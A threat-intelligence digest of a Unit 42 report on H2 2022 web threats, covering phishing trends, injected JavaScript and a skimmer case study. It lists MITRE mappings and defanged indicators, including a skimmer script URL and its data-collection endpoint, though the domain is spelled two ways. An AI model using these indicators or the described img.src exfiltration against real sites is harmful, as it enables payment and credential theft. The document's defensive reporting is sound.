Unit 42 analyzed over 67 million malicious URLs, domains, and IPs observed in H2 2022, highlighting trends in phishing, malicious JavaScript, and web skimmers, including a case study on a Tranco top 1 million site. The report notes concentration of hosting in the United States and other top countries, rising use of CAPTCHA-protected phishing, and provides IOCs such as motor.js and the personallydelivered domain. #PDF.Spam.Heur.1 #Trojan.PDF.Phishing #motor.js #personallydelivered.com
Keypoints
- H2 2022 featured over 67 million malicious domains and URLs, with about 12 million HTTP requests and 60 million DNS requests per day.
- Malicious JavaScript activity surged in H2, with 4.8 million malicious JS samples across 4.8 million URLs and 1.6 million hostnames; URLs with malicious JS rose 99.3% vs H1.
- Phishing impersonation focused on online documents/storage, Internet portals/webmail, and financial services; CAPTCHA-protected phishing and use of SaaS-hosted phishing pages increased.
- A web skimmer case study infected a Tranco top 1M motor retailer site via motor.js, stealing user data including credentials and payment information.
- Malicious PDFs remained dominant among downloaded files; top VirusTotal families included PDF.Spam.Heur.1 and Trojan.PDF.Phishing.
- Many malicious domains are subdomains of well-known hosting services (4.8%), with two hosting services accounting for ~70% of such subdomains.
- Injected JS threats span JS downloaders, web skimmers, cryptominers, redirectors, and web scams; web skimmers show greater diversity in code and behavior.
MITRE Techniques
- [T1566] Phishing – Social engineering via phishing pages impersonating services. ‘phishing attacks disguised themselves as online document and storage platforms…’
- [T1059.007] JavaScript – Injected JS used to collect data from web forms. ‘the top five injected JS malware classes in the last half of 2022 are downloaders, web skimmers, cryptominers, redirectors and web scams.’
- [T1105] Ingress Tool Transfer – JS downloader activity indicates payload download/installation. ‘JS downloader threats showed the most activity, followed by web skimmers and web miners.’
- [T1583.001] Acquire Infrastructure – Malicious domains are often subdomains of hosting services. ‘a nontrivial number of malicious domains are the subdomains of well-known web hosting services… two popular web hosting services account for around 70%…’
- [T1204.002] User Execution – CAPTCHA-protected phishing pages imply user interaction to proceed. ‘There was also an increasing trend of CAPTCHA-protected phishing pages.’
- [T1041] Exfiltration Over C2 Channel – Collected data is sent to attacker servers. ‘stores the sensitive information in an array and sends information transformed into a string to the malicious server hosted by attackers, with the img.src method shown in Figure 17.’
Indicators of Compromise
- [File] motor.js – motor[.]js, and other JS payloads related to the web skimmer
- [Hash] eaadde9a724180a0318c13a9399ec30bda7a3ec6399ff43b8b7207bf0e74332b – a sample malicious file hash
- [URL] personallydeliver[.]com/motor[.]js – URL hosting the malicious JavaScript
- [URL] personallydeliver[.]com/gatemotor[.]php – collection server endpoint
- [Domain] personallydelivered[.]com – involved domain used in the skimmer ecosystem
Read more: https://unit42.paloaltonetworks.com/internet-threats-late-2022/